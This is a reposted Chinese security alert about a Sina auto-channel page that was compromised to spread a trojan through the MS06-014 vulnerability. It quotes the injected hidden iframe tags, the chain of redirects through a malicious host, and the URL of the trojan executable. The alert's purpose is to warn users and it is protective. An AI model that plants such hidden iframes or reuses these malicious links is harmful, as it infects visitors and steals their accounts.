转帖:新浪汽车网站挂马事件 5月22日,安天实验室反病毒监测网发现,SINA网站汽车频道有页面 (http://buycar.auto.sina.com.cn/price/list_10-15.shtml)被黑客植入病毒,用户如果访问该网站,将会被病毒感染。 攻击者利用MS06-014漏洞来传播木马,该页面上,被添加了如下内容,<iframe src=http://www.wg581.com/pao.htm width=0 height=0></iframe>,在恶意网页http://www.wg581.com/pao.htm中包含如下代码<iframe src=http://www.wg581.com/ww.htm width=0 height=0></iframe>。试图通过多次页面跳转来躲避查杀。其最终链接到http://www.wg581.com/ww.htm下载木马。所下木马地址为http://www.wg581.com/win.exe。 所下木马,会下载其他恶意软件,并且会偷取用户的网游帐户及其他敏感信息。广大用户应该提高警惕,不要访问带毒网站,并及时更新您的木马防线,保护您的上网安全。 相关链接请参见:http://antiy.com/security/alarm/20070522.htm
|